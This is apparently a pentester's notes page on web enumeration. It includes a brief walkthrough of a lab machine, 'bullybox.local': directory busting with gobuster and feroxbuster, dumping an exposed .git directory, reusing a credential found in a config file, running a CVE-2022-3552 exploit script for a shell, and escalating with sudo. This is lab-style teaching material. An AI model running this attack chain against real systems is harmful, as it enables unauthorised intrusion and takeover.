80
Mapping
robots.txt:
.svn:
.DS_STORE
Directory Busting
gobuster dir -u ${ip} -w /usr/share/wordlists/dirb/common.txt -t 5
dirbuster
feroxbuster -u http://host.domain.tld:80/ -x php -C 404 -A --wordlist '/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt' -B --auto-tune
PHP
Check phpinfo or phpmyadmin:
Running dirb we notice: There is a git directory
Using git-dumper:
git-dumper http://bullybox.local/.git git
There is bb-config.php:
We can login at /bb-admin:
Logging in with admin@bullybox.local : Playing-Unstylish7-Provided
Now we can us this exploit
python3 CVE-2022-3552.py -d http://bullybox.local/ -u admin@bullybox.local -p 'Playing-Unstylish7-Provided'
After changing the ip:
Now we get a shell:
Now check id: We are sudo group so with
sudo su
Last updated
Was this helpful?